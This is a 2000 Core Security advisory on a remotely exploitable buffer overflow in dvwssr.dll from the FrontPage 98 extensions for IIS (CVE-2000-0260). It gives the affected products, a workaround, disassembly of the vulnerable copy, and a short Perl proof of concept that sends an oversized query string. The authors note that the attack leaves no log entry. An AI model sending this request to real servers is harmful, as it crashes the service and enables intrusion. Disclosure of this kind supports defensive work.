MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Date Published: 2000-04-14
Last Update: 2000-04-14
Advisory ID: CORE-041200
Bugtraq ID: 1109
CVE Name: CVE-2000-0260
Title: MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: Yes
Locally Exploitable: No
Release Mode: USER RELEASE
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.
. Microsoft FrontPage 98 Server Extensions for IIS
- Microsoft FrontPage 98
- Microsoft IIS 4.0
- Microsoft NT Option Pack for NT 4.0
. Microsoft InterDev 1.0
- Microsoft Windows NT 4.0
Workaround: Delete DVWSSR.DLL (this may break InterDev).
This vulnerability was found by Gerardo Richarte and Alberto Soliño from Core Security Technologies.
Technical Description - Exploit/Concept Code:
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
lea eax, [esp+14h+queryStringCoph]
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
lea eax, [esp+10h+queryStringCoph]
So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find this types of bugs...
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1
We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with this configuration, we have been able to make the code jump to our buffer.
Under these circunstances, the actual BO allows to execute arbitrary code in the target machine. It's interesting to note that no log is generated as effect of this attack.
About Core Security Technologies
Core Security Technologies develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets.
Headquartered in Boston, MA, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
To learn more about CORE IMPACT, the first comprehensive penetration testing framework, visit:
The contents of this advisory are copyright (c) 2003 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
$Id: iis4-advisory.txt,v 1.1 2003/04/15 16:06:11 carlos Exp $